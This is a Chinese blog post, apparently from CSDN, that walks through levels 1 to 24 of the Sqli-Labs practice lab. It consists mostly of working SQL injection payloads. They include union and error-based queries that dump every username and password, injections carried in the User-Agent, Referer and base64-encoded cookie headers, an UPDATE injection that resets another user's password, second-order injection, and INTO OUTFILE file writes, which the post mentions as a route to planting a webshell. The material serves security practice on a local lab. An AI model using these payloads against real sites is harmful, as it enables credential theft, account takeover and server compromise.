Sqli-Labs 速通

已于 2022-12-22 15:32:07 修改
阅读量913 收藏 1
点赞数
分类专栏: 日常练习 文章标签: mysql 数据库 sql
于 2022-12-02 20:19:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46684679/article/details/128153846
版权

Sqli-Labs 速通

一天一道吧。。。。

Sqli-Libs持续更新...

# 目标 直接写payload,sql语句非预期执行就算成功

表:emails,referers,uagents,users
usrs字段:id,password,username

简单大思路,有回显优先联合查询(可能需要绕过),无回显优先报错注入(可能需要绕过),其次http体找注入点,最后盲注
如有其他提示根据提示找

一般sql注入思路:注入点 -> sql语句绕过过滤 -> 联合查询、盲注等

Less-1

’绕过
http://192.168.1.28/sqli/Less-1/?id=-1' union select 1,2,group_concat(password,'~',username) from users--+

Less-2

http://192.168.1.28/sqli/Less-2/?id=-1/**/union/**/select/**/1,2,group_concat(password,'~',username) from users#

Less-3

‘)绕过
http://192.168.1.28/sqli/Less-3/?id=-1') union select 1,2,group_concat(password,'~',username) from users--+

Less-4

”)绕过
http://192.168.1.28/sqli/Less-4/?id=-1") union select 1,2,group_concat(password,'~',username) from users--+

Less-5

无回显所以’绕过报错注入
http://192.168.1.28/sqli/Less-5/?id=1' || extractvalue(1,concat(0x7e,(select(group_concat(password,'~',username))from(users))))--+

Less-6

“绕过,同上
http://192.168.1.28/sqli/Less-6/?id=1" || extractvalue(1,concat(0x7e,(select(group_concat(password,'~',username))from(users))))--+

Less-7

先看my.ini的secure_file_priv=有没有置空,如果没有可能无法导出或者只能在特定路径导出文件
路径可以自己改,这里用得最多的还是写一个一句话木马到某个路径,然后getshell
这里是默认文件导出在mysql的数据文件夹里
http://192.168.1.28/sqli/Less-7/?id=-1' )) union select id,username,password from users into outfile 'users.txt'--+

请添加图片描述

Less-8

思路和上一道相同
http://192.168.1.28/sqli/Less-8/?id=-1' union select id,username,password from users into outfile '8.txt'--+

Less-9

主要没有回显无法判断,所以只能盲打
http://192.168.1.28/sqli/Less-9/?id=-1' union select id,username,password from users into outfile '9.txt'--+

Less-10

看不懂…
http://192.168.1.28/sqli/Less-10/?id=1" union select id,username,password from users into outfile '10.txt'--+

Less-11

抓个包,POST传输,思路:弱口令、爆破或者注入,可以发现弱口令admin和admin就能正常登录
这里不用hackbar了,有点bug,改用header Live Sub插件
uname=admi' union select 1,group_concat(password,'~',username) from users--+&passwd=admin&submit=Submit

Less-12

同11题个道理,绕过就行
uname=admi") union select 1,group_concat(password,'~',username) from users--+&passwd=admin&submit=Submit

Less-13

没有正常登录时的回显,那就报错注入
uname=admin') || extractvalue(1,concat(0x7e,(select(group_concat(password,'~',username))from(users))))--+&passwd=admin&submit=Submit

Less-14

uname=admin" || extractvalue(1,concat(0x7e,(select(group_concat(password,'~',username))from(users))))--+&passwd=admin&submit=Submit

Less-15

要注意字段的数量不然会失败
uname=admin'union select username,password from users into outfile '15.txt'--+&passwd=admin&submit=Submit

时间盲注
请添加图片描述

Less-16

uname=admin") union select username,password from users into outfile '16.txt'--+&passwd=admin&submit=Submit

时间盲注

Less-17-update注入

像这种重置密码的,肯定跟UPDATE语句相关,这个地方其实挺危险的,无论是哪个参数能注入,都能把users表里密码全改了
比如这里把id为1的Dumb密码改成admin
请添加图片描述
uname=admin&passwd=admin' where id = 1--+&submit=Submit
请添加图片描述
好无聊啊~~

Less-18-ua头注入

看提示应该是http头注入
User-Agent: ' || extractvalue(1,concat(0x7e,(select(group_concat(password,'~',username))from(users)))) or '
返回:XPATH syntax error: ‘adminDumb,I-kill-you~Angelina,’
想起迪总一句话,“对于渗透,我什么都不知道,我只会吃西瓜~”

Less-19-Referer注入

Referer: ' || extractvalue(1,concat(0x7e,(select(group_concat(password,'~',username))from(users)))) or '
请添加图片描述

Less-20-cookie注入

登录时抓包,改Cookie
Cookie: uname=admi' union select 1,2,group_concat(password,'~',username) from users--+
请添加图片描述

Less-21-')绕过

一直黑盒测试好头疼,也不喜欢用工具扫这些,所以还是白盒审计吧,刚好练练代码审计
用户名和密码都被check,多半是寄了
请添加图片描述
但cookie没有,无非多个括号绕过,在cookie上增加了base64编码,所以把注入语句都编码后再输入
请添加图片描述
任意登录,然后抓包,一直放包直到出现有uname的cookie的数据包
请添加图片描述
payload:

# 源语句:
admi') union select 1,group_concat(username),group_concat(password) from users#

# base64编码后:
YWRtaScpIHVuaW9uIHNlbGVjdCAxLGdyb3VwX2NvbmNhdCh1c2VybmFtZSksZ3JvdXBfY29uY2F0KHBhc3N3b3JkKSBmcm9tIHVzZXJzIw==

请添加图片描述

Less-22-cookie双引号绕过

账号和密码都被check了
只能对cookie下手,分析源码,无非是对传入的cookie增加一对双引号,
请添加图片描述
所以末尾增加一个双引号绕开就ok,还要就是别忘了传入格式必须是base64编码
admi" union select 1,group_concat(username),group_concat(password) from users#
YWRtaSIgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSxncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gdXNlcnMj
请添加图片描述

Less-23-注释符绕过

简单代码分析,把传入的id值进行–和#替换成空
请添加图片描述

测试正常执行payload
?id=1' '
爆库payload
?id=-1' union select 1,2,database() '
爆表payload
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() or '1'= '1
爆列名payload
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' or '1'= '1
爆值payload
?id=-1' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '1

Less-24-二次注入

懒了,直接拿seay审计看重点
请添加图片描述
mysql_real_escape_string()会转义字符,但不转义%、*、_等字符
login_create.php所有传入参数都会经过mysql_real_escape_string()转义,考虑二次注入的可能,所以对pass_change.php下手
请添加图片描述
可以发现并没有对传入的username参数值进行转义,可以利用,所以思路就是可以对任何存在用户无视旧密码认证来任意修改密码,这里选择修改用户Dumb的密码为aaa
先注册一个Dumb’ #的用户,修改密码,

请添加图片描述
请添加图片描述
语句执行前用户名没有被转义,

# 就会构造出
UPDATE users SET PASSWORD='$pass' where username='Dumb' #' and password='$curr_pass'
# 即执行
UPDATE users SET PASSWORD='$pass' where username='Dumb'

达到无旧密码验证而修改Dumb密码的目的
请添加图片描述

待续....
伽蓝之堂
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sqli-Labs.zip
07-15
对前四道题目进行加强,输出在数据库中构成的查询语句,有利于新手快速入门SQLi;
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs
qq_51110485的博客
07-16 1031
sqli-labsLess-1Less-2Less-3Less-4Less-5Less-6 Less-1 进入关卡内,先判断是否存在注入情况 先输入?id =1 and 1=1,发现没有变化,换成?id=1 and 1=2,依旧没有变化,考虑是为字符型而非整形。 用?id=1'进行测试,发现页面报错,出现如下显示,证明可以进行SQL注入 发现为字符型的后先在后面加一个注释符 --+,可以正常输出 单行注释: 1.使用#注释符,#注释符后直接加注释内容 2.使用–注释符,–注释符后需要加一个空格,注释才能
Sqli-lab教程-史上最全详解(1-22通关)
最新发布
dzqxwzoe的博客
06-07 1244
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
Sqli-labs
去无人的岛,摸鲨鱼的角
12-31 219
sqli-labs Less-1 1.寻找注入点 http://127.0.0.1/sqli/Less-1/?id=1' //报错 http://127.0.0.1/sqli/Less-1/?id=1' and 1=1 --+ //正常 http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 --+ //报错 http://127.0.0.1/sqli/Less-1/?id=1' order by 4 --+ //报错,所以字段数是3 htt
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs.rar
12-22
sqli-labs是一个专门设计用于学习和练习SQL注入技术的平台,特别适合初学者了解和提升SQL注入防御技能。 首先,要搭建sqli-labs,你需要准备以下工具: 1. PHPstudy:一个集成的Web服务器环境,包括Apache、Nginx、...
sqli-labs实验环境
05-08
此实验环境包含常见的sql注入漏洞,适用于网络安全初学者,加深了解SQL注入产生的原因,以及如何修复sql注入漏洞
SQLI-LABS(Basic Challenges)
volcano的博客
12-04 729
sql注入 SQL注入是比较常见的网络攻击方式之一,一般分为数字型和字符型,攻击者在HTTP请求中输入含有恶意构造且语法合法的SQL语句,只要应用程序中没有做严格的处理(例如校验或预拼接),那么就会出现SQL注入漏洞危险。 Sqli-labs Sqli-labs-master是一个用来学习sql注入的闯关游戏。 之前看的教程中,普通题目大多数都是用union联合查询注入的,我用的是基于updatexml()函数的报错注入,这里也是参考大佬的博客慢慢学习。 函数解释:   UPDATEXML (XML_doc
sqli-labs(一)
weixin_30593261的博客
08-18 85
第一关:第一关会讲的比较详细,后面的关卡中只有特殊的地方我会单独拿出来说。 第一关是一个很简单的string类型的sql注入,并且会报错,输入参数id=',页面会报错 值得注意的是: 1.报错信息中 near "1" limit 0,1' at line 1,但是我们输入的是1',所以说这半句中的单双引号和后台sql语句中的单双引号不是对应的关系,我们做测试的时候不能根据报错信息来判断...
SQLi-labs(SQL注入练习)
blalaa的博客
09-04 224
一、 Page-1(Basic Challenges) 【Less-1】 ①判断是否存在注入 输入参数,有输出 id=1’有报错,证明有注入点 ②猜解SQL查询语句中的字段数 Order by 3 正常: Order by 4 不正常: 所以字段数为3 ③确定显示的字段 2和3是显示位: ④获取当前数据库、版本 ⑤获取数据库中的表 ?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables wh
SQL注入
suqiban7253的博客
07-26 154
#1.二次注入原理 二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。 也就是说在应用程序中输入恶意造的数据库查询语句时会被转义,但是...
mysql 字段 i d_sqli-labs(1-10)
weixin_36187176的博客
02-27 159
前言:此文用于记录学习SQL注入过程中的所得所思,因为可以说是菜鸟了,需要参考大佬的解题方法,所以一切慢慢来吧,希望越来越强。做题过程中的各种知识在mysql数据库中,单行注释有#和--,在实际操作中#号一般用%23来表示。而--则用--+来表示。因为在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,而用--+代替--,原因是+在URL被URL编码后会变成空格。与数...
sqli-labs (less-65)
kukudeshuo的博客
03-20 460
sqli-labs (less-65) 进入65关,输入 http://127.0.0.1/sql1/Less-65/?id=1 http://127.0.0.1/sql1/Less-65/?id=1' http://127.0.0.1/sql1/Less-65/?id=1" 没有任何错误信息,依然还是万恶的Boolean盲注 http://127.0.0.1/sql1/Less-65/?id=1"--+ #回显错误 http://127.0.0.1/sql1/Less-65/?id=1")--
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6580
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
"sqli-labs-master靶场安装下载" 本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值